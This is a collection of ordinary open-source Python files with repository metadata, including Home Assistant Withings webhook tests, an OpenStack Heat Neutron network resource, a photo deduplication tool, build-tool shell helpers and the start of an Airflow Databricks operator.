client: TestClient = await aiohttp_client(hass.http.app)
resp = await client.put(urlparse(data_manager.webhook_config.url).path)
# Wait for remaining tasks to complete.
await hass.async_block_till_done()
assert resp.status == 200
data = await resp.json()
assert data
assert data["code"] == 2
async def test_data_manager_webhook_subscription(
hass: HomeAssistant,
component_factory: ComponentFactory,
aioclient_mock: AiohttpClientMocker,
) -> None:
"""Test data manager webhook subscriptions."""
person0 = new_profile_config("person0", 0)
await component_factory.configure_component(profile_configs=(person0,))
api: ConfigEntryWithingsApi = MagicMock(spec=ConfigEntryWithingsApi)
data_manager = DataManager(
hass,
"person0",
api,
0,
WebhookConfig(id="1234", url="http://localhost/api/webhook/1234", enabled=True),
)
# pylint: disable=protected-access
data_manager._notify_subscribe_delay = datetime.timedelta(seconds=0)
data_manager._notify_unsubscribe_delay = datetime.timedelta(seconds=0)
api.notify_list.return_value = NotifyListResponse(
profiles=(
NotifyListProfile(
appli=NotifyAppli.BED_IN,
callbackurl="https://not.my.callback/url",
expires=None,
comment=None,
),
NotifyListProfile(
appli=NotifyAppli.BED_IN,
callbackurl=data_manager.webhook_config.url,
expires=None,
comment=None,
),
NotifyListProfile(
appli=NotifyAppli.BED_OUT,
callbackurl=data_manager.webhook_config.url,
expires=None,
comment=None,
),
)
)
aioclient_mock.clear_requests()
aioclient_mock.request(
"HEAD",
data_manager.webhook_config.url,
status=200,
)
# Test subscribing
await data_manager.async_subscribe_webhook()
api.notify_subscribe.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.WEIGHT
)
api.notify_subscribe.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.CIRCULATORY
)
api.notify_subscribe.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.ACTIVITY
)
api.notify_subscribe.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.SLEEP
)
    # These notification types must remain unsubscribed; assert_any_call
    # raising AssertionError proves the call was never made.
    with pytest.raises(AssertionError):
        api.notify_subscribe.assert_any_call(
            data_manager.webhook_config.url, NotifyAppli.USER
        )
    with pytest.raises(AssertionError):
        api.notify_subscribe.assert_any_call(
            data_manager.webhook_config.url, NotifyAppli.BED_IN
        )
    with pytest.raises(AssertionError):
        api.notify_subscribe.assert_any_call(
            data_manager.webhook_config.url, NotifyAppli.BED_OUT
        )
# Test unsubscribing.
await data_manager.async_unsubscribe_webhook()
api.notify_revoke.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.BED_IN
)
api.notify_revoke.assert_any_call(
data_manager.webhook_config.url, NotifyAppli.BED_OUT
)
| {
"content_hash": "70fc5f32d8839a57671164679a65b828",
"timestamp": "",
"source": "github",
"line_count": 242,
"max_line_length": 88,
"avg_line_length": 31.376033057851238,
"alnum_prop": 0.6520479388910839,
"repo_name": "partofthething/home-assistant",
"id": "a5946ff0533ce3ecf54d99bb00608cff42919ef3",
"size": "7593",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "tests/components/withings/test_common.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1720"
},
{
"name": "Python",
"bytes": "31051838"
},
{
"name": "Shell",
"bytes": "4832"
}
],
"symlink_target": ""
} |
import random
import unittest
import sys
sys.path.append('..')
from common.document import Document
from common.model import Model
from common.vocabulary import Vocabulary
from model_evaluator import ModelEvaluator
class ModelEvaluatorTest(unittest.TestCase):
def setUp(self):
self.model = Model(20)
self.model.load('../testdata/lda_model')
self.vocabulary = Vocabulary()
self.vocabulary.load('../testdata/vocabulary.dat')
self.model_evaluator = ModelEvaluator(self.model, self.vocabulary)
def test_compute_loglikelihood(self):
doc_tokens = ['macbook', 'ipad', # exist in vocabulary and model
'mac os x', 'chrome', # only exist in vocabulary
'nokia', 'null'] # inexistent
document = Document(self.model.num_topics)
rand = random.Random()
rand.seed(0)
document.parse_from_tokens(
doc_tokens, rand, self.vocabulary, self.model)
documents = [document, document]
self.assertEqual(-14.113955684239654,
self.model_evaluator.compute_loglikelihood(documents))
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "fecece4a0954a2c9a5e60804a618918e",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 74,
"avg_line_length": 32.69444444444444,
"alnum_prop": 0.6508071367884452,
"repo_name": "ankazhao/python-sparselda",
"id": "7b918d30a159745232dca7fd07254914d4e5ef99",
"size": "1306",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "training/model_evaluator_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import logging
from gi.repository import Gst
from lib.config import Config
from lib.clock import Clock
from lib.args import Args
class Blinder(object):
# create logging interface
log = logging.getLogger('Blinder')
def __init__(self):
# remember some things
self.acaps = Config.getAudioCaps()
self.vcaps = Config.getVideoCaps()
self.volume = Config.getBlinderVolume()
self.blindersources = Config.getBlinderSources()
self.log.info('Configuring video blinders for %u sources',
len(self.blindersources))
# open bin
self.bin = "" if Args.no_bins else """
bin.(
name=blinders
"""
# list blinders
self.livesources = Config.getLiveSources()
# add blinder pipelines
for livesource in self.livesources:
self.bin += """
compositor
name=compositor-blinder-{livesource}
! queue
max-size-time=3000000000
name=queue-video-{livesource}-blinded
! tee
name=video-{livesource}-blinded
video-{livesource}.
! queue
max-size-time=3000000000
name=queue-video-{livesource}-compositor-blinder-{livesource}
! compositor-blinder-{livesource}.
""".format(livesource=livesource)
for blindersource in self.blindersources:
self.bin += """
video-{blindersource}.
! queue
max-size-time=3000000000
name=queue-video-blinder-{blindersource}-compositor-blinder-{livesource}
! compositor-blinder-{livesource}.
""".format(
blindersource=blindersource,
livesource=livesource
)
# Audiomixer
self.bin += """
audiomixer
name=audiomixer-blinder
! audioamplify
amplification={volume}
! queue
name=queue-audio-mix-blinded
max-size-time=3000000000
! tee
name=audio-mix-blinded
audio-mix.
! queue
max-size-time=3000000000
name=queue-capssetter-blinder
! capssetter
caps={acaps}
! queue
max-size-time=3000000000
name=queue-audiomixer-blinder
! audiomixer-blinder.
""".format(acaps=self.acaps,
                   volume=self.volume
)
# Source from the Blank-Audio-Tee into the Audiomixer
self.bin += """
audio-blinder.
! queue
max-size-time=3000000000
name=queue-audio-blinded-audiomixer-blinder
! audiomixer-blinder.
"""
# close bin
self.bin += "" if Args.no_bins else "\n)\n"
self.blind_source = 0 if len(self.blindersources) > 0 else None
def __str__(self):
return 'Blinder'
def attach(self, pipeline):
self.pipeline = pipeline
self.applyMixerState()
def applyMixerState(self):
for livesource in self.livesources:
            self.applyMixerStateVideo(
                'compositor-blinder-{}'.format(livesource))
self.applyMixerStateAudio('audiomixer-blinder')
def applyMixerStateVideo(self, mixername):
mixer = self.pipeline.get_by_name(mixername)
if not mixer:
self.log.error("Video mixer '%s' not found", mixername)
else:
mixer.get_static_pad('sink_0').set_property(
'alpha', int(self.blind_source is None))
for idx, name in enumerate(self.blindersources):
blinder_pad = mixer.get_static_pad('sink_%u' % (idx + 1))
blinder_pad.set_property(
'alpha', int(self.blind_source == idx))
def applyMixerStateAudio(self, mixername):
mixer = self.pipeline.get_by_name(mixername)
if not mixer:
self.log.error("Audio mixer '%s' not found", mixername)
else:
mixer.get_static_pad('sink_0').set_property(
'volume', 1.0 if self.blind_source is None else 0.0)
mixer.get_static_pad('sink_1').set_property(
'volume', 0.0 if self.blind_source is None else 1.0)
def setBlindSource(self, source):
self.blind_source = source
self.applyMixerState()
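# Sketch only: how calling code might drive the blinder; index 0 selects the
# first configured blinder source, None reveals the live sources again.
#   blinder = Blinder()
#   blinder.attach(pipeline)
#   blinder.setBlindSource(0)     # blind
#   blinder.setBlindSource(None)  # unblind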
| {
"content_hash": "c6007d2959642b8dcbb8cf3a22fd94bd",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 96,
"avg_line_length": 33.50349650349651,
"alnum_prop": 0.5312043414735963,
"repo_name": "voc/voctomix",
"id": "5c60e6da230569124a3f273401e6e1cfb8154f8e",
"size": "4814",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "voctocore/lib/blinder.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2621"
},
{
"name": "Dockerfile",
"bytes": "2626"
},
{
"name": "Python",
"bytes": "350063"
},
{
"name": "Shell",
"bytes": "25187"
}
],
"symlink_target": ""
} |
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources.openstack.neutron import neutron
from heat.engine import support
from heat.engine import translation
class Net(neutron.NeutronResource):
"""A resource for managing Neutron net.
A network is a virtual isolated layer-2 broadcast domain which is typically
reserved to the tenant who created it, unless the network has been
explicitly configured to be shared.
"""
entity = 'network'
PROPERTIES = (
NAME, VALUE_SPECS, ADMIN_STATE_UP, TENANT_ID, SHARED,
DHCP_AGENT_IDS, PORT_SECURITY_ENABLED, QOS_POLICY,
DNS_DOMAIN, TAGS,
) = (
'name', 'value_specs', 'admin_state_up', 'tenant_id', 'shared',
'dhcp_agent_ids', 'port_security_enabled', 'qos_policy',
'dns_domain', 'tags',
)
ATTRIBUTES = (
STATUS, NAME_ATTR, SUBNETS, ADMIN_STATE_UP_ATTR, TENANT_ID_ATTR,
PORT_SECURITY_ENABLED_ATTR, MTU_ATTR, QOS_POLICY_ATTR, L2_ADJACENCY,
SEGMENTS,
) = (
"status", "name", "subnets", "admin_state_up", "tenant_id",
"port_security_enabled", "mtu", 'qos_policy_id', 'l2_adjacency',
'segments',
)
properties_schema = {
NAME: properties.Schema(
properties.Schema.STRING,
_('A string specifying a symbolic name for the network, which is '
'not required to be unique.'),
update_allowed=True
),
VALUE_SPECS: properties.Schema(
properties.Schema.MAP,
_('Extra parameters to include in the request. Parameters are '
'often specific to installed hardware or extensions.'),
default={},
update_allowed=True
),
ADMIN_STATE_UP: properties.Schema(
properties.Schema.BOOLEAN,
_('A boolean value specifying the administrative status of the '
'network.'),
default=True,
update_allowed=True
),
TENANT_ID: properties.Schema(
properties.Schema.STRING,
_('The ID of the tenant which will own the network. Only '
'administrative users can set the tenant identifier; this '
'cannot be changed using authorization policies.')
),
SHARED: properties.Schema(
properties.Schema.BOOLEAN,
_('Whether this network should be shared across all tenants. '
'Note that the default policy setting restricts usage of this '
'attribute to administrative users only.'),
default=False,
update_allowed=True
),
DHCP_AGENT_IDS: properties.Schema(
properties.Schema.LIST,
_('The IDs of the DHCP agent to schedule the network. Note that '
'the default policy setting in Neutron restricts usage of this '
'property to administrative users only.'),
update_allowed=True
),
PORT_SECURITY_ENABLED: properties.Schema(
properties.Schema.BOOLEAN,
_('Flag to enable/disable port security on the network. It '
'provides the default value for the attribute of the ports '
'created on this network.'),
update_allowed=True,
support_status=support.SupportStatus(version='5.0.0')
),
QOS_POLICY: properties.Schema(
properties.Schema.STRING,
_('The name or ID of QoS policy to attach to this network.'),
constraints=[
constraints.CustomConstraint('neutron.qos_policy')
],
update_allowed=True,
support_status=support.SupportStatus(version='6.0.0')
),
DNS_DOMAIN: properties.Schema(
properties.Schema.STRING,
_('DNS domain associated with this network.'),
constraints=[
constraints.CustomConstraint('dns_domain')
],
update_allowed=True,
support_status=support.SupportStatus(version='7.0.0')
),
TAGS: properties.Schema(
properties.Schema.LIST,
_('The tags to be added to the network.'),
schema=properties.Schema(properties.Schema.STRING),
update_allowed=True,
support_status=support.SupportStatus(version='9.0.0')
),
}
attributes_schema = {
STATUS: attributes.Schema(
_("The status of the network."),
type=attributes.Schema.STRING
),
NAME_ATTR: attributes.Schema(
_("The name of the network."),
type=attributes.Schema.STRING
),
SUBNETS: attributes.Schema(
_("Subnets of this network."),
type=attributes.Schema.LIST
),
ADMIN_STATE_UP_ATTR: attributes.Schema(
_("The administrative status of the network."),
type=attributes.Schema.STRING
),
TENANT_ID_ATTR: attributes.Schema(
_("The tenant owning this network."),
type=attributes.Schema.STRING
),
PORT_SECURITY_ENABLED_ATTR: attributes.Schema(
_("Port security enabled of the network."),
support_status=support.SupportStatus(version='5.0.0'),
type=attributes.Schema.BOOLEAN
),
MTU_ATTR: attributes.Schema(
_("The maximum transmission unit size(in bytes) for the network."),
support_status=support.SupportStatus(version='5.0.0'),
type=attributes.Schema.INTEGER
),
QOS_POLICY_ATTR: attributes.Schema(
_("The QoS policy ID attached to this network."),
type=attributes.Schema.STRING,
support_status=support.SupportStatus(version='6.0.0'),
),
L2_ADJACENCY: attributes.Schema(
_("A boolean value for L2 adjacency, True means that you can "
"expect L2 connectivity throughout the Network."),
type=attributes.Schema.BOOLEAN,
support_status=support.SupportStatus(version='9.0.0'),
),
SEGMENTS: attributes.Schema(
_("The segments of this network."),
type=attributes.Schema.LIST,
support_status=support.SupportStatus(version='11.0.0'),
),
}
def translation_rules(self, properties):
return [translation.TranslationRule(
properties,
translation.TranslationRule.RESOLVE,
[self.QOS_POLICY],
client_plugin=self.client_plugin(),
finder='get_qos_policy_id')]
def handle_create(self):
props = self.prepare_properties(
self.properties,
self.physical_resource_name())
dhcp_agent_ids = props.pop(self.DHCP_AGENT_IDS, None)
qos_policy = props.pop(self.QOS_POLICY, None)
tags = props.pop(self.TAGS, [])
if qos_policy:
props['qos_policy_id'] = qos_policy
net = self.client().create_network({'network': props})['network']
self.resource_id_set(net['id'])
if dhcp_agent_ids:
self._replace_dhcp_agents(dhcp_agent_ids)
if tags:
self.set_tags(tags)
def check_create_complete(self, *args):
attributes = self._show_resource()
self._store_config_default_properties(attributes)
return self.is_built(attributes)
def handle_delete(self):
try:
self.client().delete_network(self.resource_id)
except Exception as ex:
self.client_plugin().ignore_not_found(ex)
else:
return True
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
if prop_diff:
self.prepare_update_properties(prop_diff)
if self.DHCP_AGENT_IDS in prop_diff:
dhcp_agent_ids = prop_diff.pop(self.DHCP_AGENT_IDS) or []
self._replace_dhcp_agents(dhcp_agent_ids)
if self.QOS_POLICY in prop_diff:
qos_policy = prop_diff.pop(self.QOS_POLICY)
prop_diff[
'qos_policy_id'] = self.client_plugin().get_qos_policy_id(
qos_policy) if qos_policy else None
if self.TAGS in prop_diff:
self.set_tags(prop_diff.pop(self.TAGS))
if prop_diff:
self.client().update_network(self.resource_id,
{'network': prop_diff})
def check_update_complete(self, *args):
attributes = self._show_resource()
return self.is_built(attributes)
def _replace_dhcp_agents(self, dhcp_agent_ids):
ret = self.client().list_dhcp_agent_hosting_networks(
self.resource_id)
old = set([agent['id'] for agent in ret['agents']])
new = set(dhcp_agent_ids)
for dhcp_agent_id in new - old:
try:
self.client().add_network_to_dhcp_agent(
dhcp_agent_id, {'network_id': self.resource_id})
except Exception as ex:
                # if 409 happens, the agent is already associated.
if not self.client_plugin().is_conflict(ex):
raise
for dhcp_agent_id in old - new:
try:
self.client().remove_network_from_dhcp_agent(
dhcp_agent_id, self.resource_id)
except Exception as ex:
                # two status codes are expected here:
# 404: the network or agent is already gone
# 409: the network isn't scheduled by the dhcp_agent
if not (self.client_plugin().is_conflict(ex) or
self.client_plugin().is_not_found(ex)):
raise
def parse_live_resource_data(self, resource_properties, resource_data):
result = super(Net, self).parse_live_resource_data(
resource_properties, resource_data)
result.pop(self.SHARED)
result[self.QOS_POLICY] = resource_data.get('qos_policy_id')
try:
dhcp = self.client().list_dhcp_agent_hosting_networks(
self.resource_id)
dhcp_agents = set([agent['id'] for agent in dhcp['agents']])
result.update({self.DHCP_AGENT_IDS: list(dhcp_agents)})
except self.client_plugin().exceptions.Forbidden:
            # Just don't add dhcp_agent_ids if we can't get the values.
pass
return result
def _resolve_attribute(self, name):
if self.resource_id is None:
return
if name == self.SEGMENTS:
return [segment.to_dict() for segment in list(self.client(
'openstack').network.segments(network_id=self.resource_id))]
attributes = self._show_resource()
return attributes[name]
def resource_mapping():
return {
'OS::Neutron::Net': Net,
}
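# For orientation, a minimal HOT template using this plugin might look like
# the following (YAML; property values are made up):
#   resources:
#     my_net:
#       type: OS::Neutron::Net
#       properties:
#         name: demo-net
#         shared: false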
| {
"content_hash": "7751c675171b64f8638d4e8ec83a6c5c",
"timestamp": "",
"source": "github",
"line_count": 283,
"max_line_length": 79,
"avg_line_length": 38.93992932862191,
"alnum_prop": 0.5774954627949184,
"repo_name": "noironetworks/heat",
"id": "62a19e1ff75d18c7cd6bf5f2b8625f23281e257b",
"size": "11595",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "heat/engine/resources/openstack/neutron/net.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8804896"
},
{
"name": "Shell",
"bytes": "64533"
}
],
"symlink_target": ""
} |
import logging
import itertools
import os
import sqlite3
import exifread
from photodedup.fileindex import FileIndex
logger = logging.getLogger()
class PhotoDedup():
"""
    PhotoDedup deduplicates all image files stored within a directory. It uses
    SQLite to store EXIF info for images, and a built-in file index to quickly
    find new and deleted files.
"""
def __init__(self, image_folder_path):
# Create photoindex folder
photoindexfolder = os.path.join(os.path.expanduser("~"), ".photoindex")
try:
os.mkdir(photoindexfolder)
        except OSError:
            logger.debug("Can't create index folder (it may already exist)")
# Create SQLlite connection
self.conn=sqlite3.connect(os.path.join(photoindexfolder, "images.sqlite"))
self.image_folder_path=image_folder_path
self.fileindex= FileIndex(image_folder_path)
def scan_images(self):
"""
        Scan images using the file index and sync new/deleted files into
        the SQLite index.
"""
self.fileindex.scanfiles()
self._insert_images(self.fileindex.get_new_images())
self._delete_images(self.fileindex.get_deleted_images())
def create_index(self):
logger.info("Create index if not exists")
cur = self.conn.cursor()
cur.execute('''create table if not exists images
(timestamp text ,
CreateDate text,
GPSLatitude real,
GPSLongitude real,
GPSAltitude real ,
SourceFile text,
PRIMARY KEY (timestamp, SourceFile)
)''')
def get_duplicate_images(self):
cur = self.conn.cursor()
sql='''
select * from images
where timestamp in (
select timestamp from images
where timestamp != ""
group by timestamp
having count(*)>1)
except
select *
from images
group by timestamp
'''
result = [row[5] for row in cur.execute(sql)]
return result
def get_unique_images(self):
cur = self.conn.cursor()
sql='''
select * from images
group by timestamp
order by SourceFile
'''
result = [row[5] for row in cur.execute(sql)]
return result
def print(self, result):
for image in result:
print(image)
def _insert_images(self, new_images):
cur = self.conn.cursor()
count = 0
for meta_data_list in split_every(1000, self.__get_images_metadata(new_images)):
columns = [(str(d.get("EXIF DateTimeOriginal", d.get("Image DateTime", ""))),
str(d.get("EXIF DateTimeOriginal", "")),
str(d.get("GPS GPSLatitude", "")),
str(d.get("GPS GPSLongitude", "")),
str(d.get("GPS GPSAltitude", "")),
d.get("SourceFile", "")
) for d in meta_data_list]
count += len(columns)
logger.info("Processed %d images..." % count)
for metadata in meta_data_list:
logger.debug("inserting %s", metadata.get("SourceFile", ""))
cur.executemany("insert or ignore into images values (?, ?, ? ,?, ?, ?)", columns)
self.conn.commit()
def _delete_images(self, new_images):
cur = self.conn.cursor()
count = 0
for imagelist in split_every(1000, new_images):
if imagelist:
columns = [(image,) for image in imagelist]
cur.executemany("delete from images where SourceFile=?", columns)
self.conn.commit()
def __get_images_metadata(self, images):
for filename in images:
            # Context manager ensures the file handle is closed even if
            # exifread raises.
            with open(filename, "rb") as f:
                tags = exifread.process_file(f, details=False)
                tags["SourceFile"] = filename
                yield tags
def split_every(n, iterable):
    """Yield successive lists of at most ``n`` items from ``iterable``."""
    i = iter(iterable)
piece = list(itertools.islice(i, n))
while piece:
yield piece
piece = list(itertools.islice(i, n))
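# Hypothetical usage sketch; the folder path is an assumption.
if __name__ == '__main__':
    dedup = PhotoDedup('/path/to/photos')
    dedup.create_index()
    dedup.scan_images()
    dedup.print(dedup.get_duplicate_images())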
| {
"content_hash": "7676a3f22fbbb9d7cc323ae177ae82ba",
"timestamp": "",
"source": "github",
"line_count": 135,
"max_line_length": 116,
"avg_line_length": 30.82962962962963,
"alnum_prop": 0.5478135511773186,
"repo_name": "puyuan/photodedup",
"id": "3402a57386545b1ae0f68046546768ae7c7320af",
"size": "4201",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "photodedup/photodedup.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "9075"
}
],
"symlink_target": ""
} |
from mic import msger
from mic.utils import runner
def exec_cmd(cmd_and_args, as_shell = False, catch = 3):
"""
Execute command, catching stderr, stdout
Need to execute as_shell if the command uses wildcards
"""
msger.debug("exec_cmd: %s" % cmd_and_args)
args = cmd_and_args.split()
msger.debug(args)
if (as_shell):
rc, out = runner.runtool(cmd_and_args, catch)
else:
rc, out = runner.runtool(args, catch)
out = out.strip()
msger.debug("exec_cmd: output for %s (rc = %d): %s" % \
(cmd_and_args, rc, out))
if rc != 0:
        # We don't raise an exception when the return code is non-zero,
        # because parted always fails to reload the partition table with
        # loop devices, which prevents us from distinguishing real errors
        # by return code alone.
msger.warning("WARNING: %s returned '%s' instead of 0" % (cmd_and_args, rc))
return (rc, out)
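def _demo_exec_cmd():
    # Sketch only: a plain invocation versus a wildcard pattern, which needs
    # as_shell=True so the shell expands it; the paths are made up.
    rc, out = exec_cmd('ls -l /tmp')
    rc, out = exec_cmd('ls /tmp/*.img', as_shell=True)
    return rc, out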
def exec_cmd_quiet(cmd_and_args, as_shell = False):
"""
Execute command, catching nothing in the output
Need to execute as_shell if the command uses wildcards
"""
return exec_cmd(cmd_and_args, as_shell, 0)
def exec_native_cmd(cmd_and_args, native_sysroot, catch = 3):
"""
Execute native command, catching stderr, stdout
Need to execute as_shell if the command uses wildcards
Always need to execute native commands as_shell
"""
native_paths = \
"export PATH=%s/sbin:%s/usr/sbin:%s/usr/bin:$PATH" % \
(native_sysroot, native_sysroot, native_sysroot)
native_cmd_and_args = "%s;%s" % (native_paths, cmd_and_args)
msger.debug("exec_native_cmd: %s" % cmd_and_args)
args = cmd_and_args.split()
msger.debug(args)
rc, out = exec_cmd(native_cmd_and_args, True, catch)
if rc == 127: # shell command-not-found
msger.error("A native (host) program required to build the image "
"was not found (see details above). Please make sure "
"it's installed and try again.")
return (rc, out)
def exec_native_cmd_quiet(cmd_and_args, native_sysroot):
"""
Execute native command, catching nothing in the output
Need to execute as_shell if the command uses wildcards
Always need to execute native commands as_shell
"""
return exec_native_cmd(cmd_and_args, native_sysroot, 0)
# kickstart doesn't support variable substitution in commands, so this
# is our current simplistic scheme for supporting that
wks_vars = dict()
def get_wks_var(key):
return wks_vars[key]
def add_wks_var(key, val):
wks_vars[key] = val
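def _demo_wks_vars():
    # Illustration only: registering and reading back a substitution
    # variable; the key and value are made up.
    add_wks_var('MY_ROOTFS', '/build/rootfs')
    return get_wks_var('MY_ROOTFS')  # -> '/build/rootfs'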
BOOTDD_EXTRA_SPACE = 16384
IMAGE_EXTRA_SPACE = 10240
__bitbake_env_lines = ""
def set_bitbake_env_lines(bitbake_env_lines):
global __bitbake_env_lines
__bitbake_env_lines = bitbake_env_lines
def get_bitbake_env_lines():
return __bitbake_env_lines
def get_line_val(line, key):
"""
Extract the value from the VAR="val" string
"""
if line.startswith(key + "="):
stripped_line = line.split('=')[1]
stripped_line = stripped_line.replace('\"', '')
return stripped_line
return None
def get_bitbake_var(key):
for line in __bitbake_env_lines.split('\n'):
        val = get_line_val(line, key)
        if val:
            return val
return None
| {
"content_hash": "b75b3bb1cb2b4dd543227ddef5d14eb1",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 84,
"avg_line_length": 28.572649572649574,
"alnum_prop": 0.6317678731678134,
"repo_name": "marcosbontempo/inatelos",
"id": "7ad3aa968502520e8c0d65b137e1258e07968652",
"size": "4324",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "poky-daisy/scripts/lib/mic/utils/oe/misc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "158"
},
{
"name": "BitBake",
"bytes": "1910696"
},
{
"name": "BlitzBasic",
"bytes": "4400"
},
{
"name": "C",
"bytes": "1751572"
},
{
"name": "C++",
"bytes": "354295"
},
{
"name": "CMake",
"bytes": "6537"
},
{
"name": "CSS",
"bytes": "27029"
},
{
"name": "Groff",
"bytes": "502444"
},
{
"name": "HTML",
"bytes": "141762"
},
{
"name": "JavaScript",
"bytes": "22555"
},
{
"name": "Lua",
"bytes": "1194"
},
{
"name": "Makefile",
"bytes": "32254"
},
{
"name": "Nginx",
"bytes": "2744"
},
{
"name": "Perl",
"bytes": "66300"
},
{
"name": "Perl6",
"bytes": "73"
},
{
"name": "Python",
"bytes": "3529760"
},
{
"name": "Shell",
"bytes": "598521"
},
{
"name": "Tcl",
"bytes": "60106"
},
{
"name": "VimL",
"bytes": "8506"
},
{
"name": "XSLT",
"bytes": "8814"
}
],
"symlink_target": ""
} |
"""This module contains Databricks operators."""
import time
from typing import Any, Dict, List, Optional, Union
from airflow.exceptions import AirflowException
from airflow.models import BaseOperator
from airflow.providers.databricks.hooks.databricks import DatabricksHook
XCOM_RUN_ID_KEY = 'run_id'
XCOM_RUN_PAGE_URL_KEY = 'run_page_url'
def _deep_string_coerce(content, json_path: str = 'json') -> Union[str, list, dict]:
"""
    Coerce ``content`` -- or, if it is a dict, all of its values -- to strings.
    The function will raise if ``content`` contains non-string or non-numeric
    types.
    We need this because the ``self.json`` field must be a dict with only
    string values; ``render_template`` will fail for numerical values.
"""
coerce = _deep_string_coerce
if isinstance(content, str):
return content
elif isinstance(
content,
(
int,
float,
),
):
# Databricks can tolerate either numeric or string types in the API backend.
return str(content)
elif isinstance(content, (list, tuple)):
return [coerce(e, f'{json_path}[{i}]') for i, e in enumerate(content)]
elif isinstance(content, dict):
return {k: coerce(v, f'{json_path}[{k}]') for k, v in list(content.items())}
else:
param_type = type(content)
msg = f'Type {param_type} used for parameter {json_path} is not a number or a string'
raise AirflowException(msg)
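def _demo_deep_string_coerce():
    # Illustrative sketch (not part of the provider): nested run parameters
    # are normalized into the all-string form the Jobs API expects.
    coerced = _deep_string_coerce({'job_id': 42, 'tags': ['etl', 7], 'retries': 1.5})
    assert coerced == {'job_id': '42', 'tags': ['etl', '7'], 'retries': '1.5'}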
def _handle_databricks_operator_execution(operator, hook, log, context) -> None:
"""
    Handles the Airflow + Databricks lifecycle logic for a Databricks operator.
    :param operator: Databricks operator being handled
    :param hook: Databricks hook used to poll the run state
    :param log: logger used to report progress
    :param context: Airflow context
"""
if operator.do_xcom_push:
context['ti'].xcom_push(key=XCOM_RUN_ID_KEY, value=operator.run_id)
log.info('Run submitted with run_id: %s', operator.run_id)
run_page_url = hook.get_run_page_url(operator.run_id)
if operator.do_xcom_push:
context['ti'].xcom_push(key=XCOM_RUN_PAGE_URL_KEY, value=run_page_url)
log.info('View run status, Spark UI, and logs at %s', run_page_url)
while True:
run_state = hook.get_run_state(operator.run_id)
if run_state.is_terminal:
if run_state.is_successful:
log.info('%s completed successfully.', operator.task_id)
log.info('View run status, Spark UI, and logs at %s', run_page_url)
return
else:
error_message = f'{operator.task_id} failed with terminal state: {run_state}'
raise AirflowException(error_message)
else:
log.info('%s in run state: %s', operator.task_id, run_state)
log.info('View run status, Spark UI, and logs at %s', run_page_url)
log.info('Sleeping for %s seconds.', operator.polling_period_seconds)
time.sleep(operator.polling_period_seconds)
class DatabricksSubmitRunOperator(BaseOperator):
"""
Submits a Spark job run to Databricks using the
`api/2.0/jobs/runs/submit
<https://docs.databricks.com/api/latest/jobs.html#runs-submit>`_
API endpoint.
There are two ways to instantiate this operator.
In the first way, you can take the JSON payload that you typically use
to call the ``api/2.0/jobs/runs/submit`` endpoint and pass it directly
to our ``DatabricksSubmitRunOperator`` through the ``json`` parameter.
For example ::
json = {
'new_cluster': {
'spark_version': '2.1.0-db3-scala2.11',
'num_workers': 2
},
'notebook_task': {
'notebook_path': '/Users/airflow@example.com/PrepareData',
},
}
notebook_run = DatabricksSubmitRunOperator(task_id='notebook_run', json=json)
Another way to accomplish the same thing is to use the named parameters
of the ``DatabricksSubmitRunOperator`` directly. Note that there is exactly
one named parameter for each top level parameter in the ``runs/submit``
endpoint. In this method, your code would look like this: ::
new_cluster = {
'spark_version': '2.1.0-db3-scala2.11',
'num_workers': 2
}
notebook_task = {
'notebook_path': '/Users/airflow@example.com/PrepareData',
}
notebook_run = DatabricksSubmitRunOperator(
task_id='notebook_run',
new_cluster=new_cluster,
notebook_task=notebook_task)
In the case where both the json parameter **AND** the named parameters
are provided, they will be merged together. If there are conflicts during the merge,
the named parameters will take precedence and override the top level ``json`` keys.
Currently the named parameters that ``DatabricksSubmitRunOperator`` supports are
- ``spark_jar_task``
- ``notebook_task``
- ``spark_python_task``
- ``spark_submit_task``
- ``new_cluster``
- ``existing_cluster_id``
- ``libraries``
- ``run_name``
- ``timeout_seconds``
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:DatabricksSubmitRunOperator`
:param json: A JSON object containing API parameters which will be passed
directly to the ``api/2.0/jobs/runs/submit`` endpoint. The other named parameters
(i.e. ``spark_jar_task``, ``notebook_task``..) to this operator will
be merged with this json dictionary if they are provided.
If there are conflicts during the merge, the named parameters will
take precedence and override the top level json keys. (templated)
.. seealso::
For more information about templating see :ref:`concepts:jinja-templating`.
https://docs.databricks.com/api/latest/jobs.html#runs-submit
:type json: dict
:param spark_jar_task: The main class and parameters for the JAR task. Note that
the actual JAR is specified in the ``libraries``.
*EITHER* ``spark_jar_task`` *OR* ``notebook_task`` *OR* ``spark_python_task``
*OR* ``spark_submit_task`` should be specified.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#jobssparkjartask
:type spark_jar_task: dict
:param notebook_task: The notebook path and parameters for the notebook task.
*EITHER* ``spark_jar_task`` *OR* ``notebook_task`` *OR* ``spark_python_task``
*OR* ``spark_submit_task`` should be specified.
This field will be templated.
.. seealso::
https://docs.databricks.com/api/latest/jobs.html#jobsnotebooktask
:type notebook_task: dict
:param spark_python_task: The python file path and parameters to run the python file with.
